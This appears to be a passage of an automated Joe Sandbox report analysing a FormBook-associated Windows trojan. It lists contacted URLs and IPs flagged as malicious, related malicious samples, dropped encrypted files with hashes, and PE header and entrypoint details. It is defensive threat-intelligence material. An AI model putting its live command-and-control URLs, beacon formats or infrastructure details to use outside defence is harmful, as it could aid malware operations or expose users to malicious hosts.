                                      http://www.qqa79.top/t67p/?WLtH=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXJ5swGMf6I8KHf6mMNpdMDm5G/Ryzlg==&W0-=CzJDBfQxOTFPLtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.gk88top.top/vjnn/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.mffnow.info/0pqe/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.infohive.website/cnve/?WLtH=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVbx8sa0WS/cLCNqs3fCZ4mL4UPzN89Q==&W0-=CzJDBfQxOTFPLtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.sunnyz.store/ead0/?WLtH=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhs+/iOoUSS+snV9WWhaA8IUFph6/7A==&W0-=CzJDBfQxOTFPLtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.127358.win/2mep/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.muasamgiare.click/dc08/true
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabcomp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://whois.gandi.net/en/results?search=sunnyz.storecomp.exe, 00000007.00000002.3155140386.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000007.00000002.3156777600.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.000000000317C000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.gandi.net/en/domaincomp.exe, 00000007.00000002.3155140386.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000007.00000002.3156777600.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.000000000317C000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.ecosia.org/newtab/comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ac.ecosia.org/autocomplete?q=comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgBcomp.exe, 00000007.00000002.3155140386.000000000414E000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.000000000330E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://codepen.io/uzcho_/pens/popular/?grid_type=listcomp.exe, 00000007.00000002.3155140386.0000000003E2A000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.0000000002FEA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://codepen.io/uzcho_/pen/eYdmdXw.csscomp.exe, 00000007.00000002.3155140386.0000000003E2A000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.0000000002FEA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcomp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.mffnow.infoOGbZSCDMTTWQqW.exe, 00000008.00000002.3155508857.0000000004C06000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          38.47.233.21
                                                          		qqa79.topUnited States
                                                          		174COGENT-174UStrue
                                                          13.248.169.48
                                                          		www.sfantulandrei.infoUnited States
                                                          		16509AMAZON-02UStrue
                                                          172.67.137.47
                                                          		www.gk88top.topUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          217.70.184.50
                                                          		webredir.vip.gandi.netFrance
                                                          		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                          104.21.64.1
                                                          		www.mffnow.infoUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          13.228.81.39
                                                          		dns.ladipage.comUnited States
                                                          		16509AMAZON-02USfalse
                                                          66.29.149.46
                                                          		www.infohive.websiteUnited States
                                                          		19538ADVANTAGECOMUStrue
                                                          206.238.89.119
                                                          		www.127358.winUnited States
                                                          		174COGENT-174USfalse

                                                          General Information

                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588628
                                                          Start date and time:2025-01-11 03:30:15 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 9m 37s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Run name:Run with higher sleep bypass
                                                          Number of analysed new started processes analysed:12
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:SpCuEoekPa.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:e0ec2a4761f2959631f99efb266eb3aa1c78ea3ed7741c28387143dc9e28fc21.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/3@8/8
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 90%
                                                          • Number of executed functions: 47
                                                          • Number of non-executed functions: 286
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.

                                                          Simulations

                                                          Behavior and APIs

                                                          No simulations

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          38.47.233.21Recibos.exeGet hashmaliciousFormBookBrowse
                                                          • www.qqa79.top/dp98/
                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                          • www.qqa79.top/dp98/
                                                          13.248.169.48suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                          • www.optimismbank.xyz/98j3/
                                                          e47m9W6JGQ.exeGet hashmaliciousFormBookBrowse
                                                          • www.bcg.services/5onp/
                                                          25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                          • www.shipley.group/wfhx/
                                                          gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                          • www.autonomousoid.pro/m1if/
                                                          fFoOcuxK7M.exeGet hashmaliciousFormBookBrowse
                                                          • www.bcg.services/5onp/
                                                          aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                          • www.fortevision.xyz/dash/
                                                          EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                          • www.sfantulandrei.info/wvsm/
                                                          bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                          • www.108.foundation/lnu5/
                                                          OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                          • www.tals.xyz/h8xm/
                                                          QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                          • www.hsa.world/09b7/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          webredir.vip.gandi.netEIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          Quotation Request-349849.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          MA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          PO# 81136575.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                          • 217.70.184.50
                                                          Order No 24.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          RFQ.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          www.127358.winEIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                          • 206.238.89.119
                                                          u549ed5dEA.exeGet hashmaliciousFormBookBrowse
                                                          • 206.238.89.119
                                                          Quotation Request-349849.exeGet hashmaliciousFormBookBrowse
                                                          • 206.238.89.119
                                                          QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                          • 206.238.89.119
                                                          lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                          • 206.238.89.119
                                                          Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                          • 206.238.89.119
                                                          IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 206.238.89.119
                                                          need quotations.exeGet hashmaliciousFormBookBrowse
                                                          • 206.238.89.119

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSAJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 104.21.80.1
                                                          n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.80.1
                                                          njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                          • 104.21.16.1
                                                          AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.186.192
                                                          k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.96.1
                                                          rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 104.21.80.1
                                                          YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.112.1
                                                          ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.16.1
                                                          AMAZON-02USsuBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          5.elfGet hashmaliciousUnknownBrowse
                                                          • 157.175.218.227
                                                          BzK8rQh2O3.exeGet hashmaliciousFormBookBrowse
                                                          • 18.141.10.107
                                                          k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                          • 18.163.74.139
                                                          e47m9W6JGQ.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                          • 18.163.74.139
                                                          http://www.jadavisinjurylawyers.com/Get hashmaliciousUnknownBrowse
                                                          • 54.231.128.160
                                                          uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                          • 18.141.10.107
                                                          https://noiclethomas.wixsite.com/riceGet hashmaliciousUnknownBrowse
                                                          • 99.86.4.105
                                                          phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousUnknownBrowse
                                                          • 108.128.172.10
                                                          COGENT-174USsuBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                          • 154.23.178.231
                                                          e47m9W6JGQ.exeGet hashmaliciousFormBookBrowse
                                                          • 154.23.178.231
                                                          BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                          • 154.23.184.95
                                                          5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                          • 38.46.13.54
                                                          gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                          • 38.181.21.178
                                                          fFoOcuxK7M.exeGet hashmaliciousFormBookBrowse
                                                          • 154.23.178.231
                                                          NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                          • 154.12.28.184
                                                          3WQwD4Z4L7.exeGet hashmaliciousXWormBrowse
                                                          • 154.39.0.150
                                                          EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                          • 206.238.89.119
                                                          wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                          • 38.47.233.21

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\2-64-111

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\comp.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1211596417522893
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                          MD5:0AB67F0950F46216D5590A6A41A267C7
                                                          SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                          SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                          SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\aut3CC6.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SpCuEoekPa.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):288256
                                                          Entropy (8bit):7.993346610993587
                                                          Encrypted:true
                                                          SSDEEP:6144:ChETDMF7OgAJ550P0/gheEtkqcXXjZm8fYVWsfUW8/38xXuCl4+IfaDvA:ChETA9Sf03hlkqcXXjg8fs8J/3wuCl4P
                                                          MD5:020460D3CDB5F033F18BCDA0B420DCBC
                                                          SHA1:EB99C89E000690CB1A1ED3ACCA88409CA4B9316B
                                                          SHA-256:29129E12222E1B98E1CDE11FEA819D902107C3F2C979EE7FBD9910A5D51F9AC2
                                                          SHA-512:A4F93865778D534F0FC3B40373A0C16F5C9A72B71BEA17F2E856CEF576B15C6ADD138765BF98E4E2B3F231D6231E01AF43AC203908B3E4E7D0E4263CDFF3F407
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...0GBZW2DC8..AD.0DBZW6D.8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70.BZW8[.6K.H...E..vb,*Kk$3+PB%/z4W*-W?t#!.B1,z>Xd.w.t,+SUjOW].DC8KTADN1M.g7Q.~X,.|$P.^...$$.Q...P#.@..X,..-TXy"=.6DC8KTADguDB.V7DS#R.AD70DBZW.DA9@UJD7d@BZW6DC8KT.P70DRZW64G8KT.D7 DBZU6DE8KTAD70BBZW6DC8K$ED72DBZW6DA8..AD'0DRZW6DS8KDAD70DBJW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8e $<C0DB..2DC(KTA.30DRZW6DC8KTAD70DBzW6$C8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DB

                                                          C:\Users\user\AppData\Local\Temp\inhumation

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SpCuEoekPa.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):288256
                                                          Entropy (8bit):7.993346610993587
                                                          Encrypted:true
                                                          SSDEEP:6144:ChETDMF7OgAJ550P0/gheEtkqcXXjZm8fYVWsfUW8/38xXuCl4+IfaDvA:ChETA9Sf03hlkqcXXjg8fs8J/3wuCl4P
                                                          MD5:020460D3CDB5F033F18BCDA0B420DCBC
                                                          SHA1:EB99C89E000690CB1A1ED3ACCA88409CA4B9316B
                                                          SHA-256:29129E12222E1B98E1CDE11FEA819D902107C3F2C979EE7FBD9910A5D51F9AC2
                                                          SHA-512:A4F93865778D534F0FC3B40373A0C16F5C9A72B71BEA17F2E856CEF576B15C6ADD138765BF98E4E2B3F231D6231E01AF43AC203908B3E4E7D0E4263CDFF3F407
                                                          Malicious:false
                                                          Preview:...0GBZW2DC8..AD.0DBZW6D.8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70.BZW8[.6K.H...E..vb,*Kk$3+PB%/z4W*-W?t#!.B1,z>Xd.w.t,+SUjOW].DC8KTADN1M.g7Q.~X,.|$P.^...$$.Q...P#.@..X,..-TXy"=.6DC8KTADguDB.V7DS#R.AD70DBZW.DA9@UJD7d@BZW6DC8KT.P70DRZW64G8KT.D7 DBZU6DE8KTAD70BBZW6DC8K$ED72DBZW6DA8..AD'0DRZW6DS8KDAD70DBJW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8e $<C0DB..2DC(KTA.30DRZW6DC8KTAD70DBzW6$C8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DBZW6DC8KTAD70DB

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.221614582911501
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:SpCuEoekPa.exe
                                                          File size:1'192'448 bytes
                                                          MD5:9a01cd212369451960342e9ccf98c51d
                                                          SHA1:4ef0a6f2fe5a55bffa839ede7a2e8093fe741533
                                                          SHA256:e0ec2a4761f2959631f99efb266eb3aa1c78ea3ed7741c28387143dc9e28fc21
                                                          SHA512:fb9e0c8d72b5ec37d6b1896c2820102a3a55b9906791e3db9f161c0f1e056421633e40e1f5c7d4de81e83206fbd60a8d786ea0630f6bcfe957ec216266adb5ef
                                                          SSDEEP:24576:Iu6J33O0c+JY5UZ+XC0kGso6FawIzjdMbsU/0E1WY:iu0c++OCvkGs9FawIlLY
                                                          TLSH:0345CF22B3DDC361CB769173BF6AB3056EBF78610630B8572F980D79A950171262C7A3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                          File Icon

                                                          Icon Hash:8ea4b193b1ec9a84

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x427dcd
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x674FD88C [Wed Dec 4 04:20:28 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007FA36524FD1Ah
                                                          jmp 00007FA365242AE4h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007FA365242C6Ah
                                                          cmp edi, eax
                                                          jc 00007FA365242FCEh
                                                          bt dword ptr [004C31FCh], 01h
                                                          jnc 00007FA365242C69h
                                                          rep movsb
                                                          jmp 00007FA365242F7Ch
                                                          cmp ecx, 00000080h
                                                          jc 00007FA365242E34h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007FA365242C70h
                                                          bt dword ptr [004BE324h], 01h
                                                          jc 00007FA365243140h
                                                          bt dword ptr [004C31FCh], 00000000h
                                                          jnc 00007FA365242E0Dh
                                                          test edi, 00000003h
                                                          jne 00007FA365242E1Eh
                                                          test esi, 00000003h
                                                          jne 00007FA365242DFDh
                                                          bt edi, 02h
                                                          jnc 00007FA365242C6Fh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007FA365242C73h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007FA365242CC5h
                                                          bt esi, 03h
                                                          jnc 00007FA365242D18h

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD4 build 31101
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD4 build 31101

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5a940.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1220000x711c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xc70000x5a9400x5aa003e2e88f2a50c8ced1c5f4dacce624ef5False0.9766487068965517data7.971709989877312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x1220000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xc77d00x10d7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9213639526791928
                                                          RT_MENU0xc88a80x50dataEnglishGreat Britain0.9
                                                          RT_STRING0xc88f80x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0xc8e8c0x68adataEnglishGreat Britain0.2747909199522103
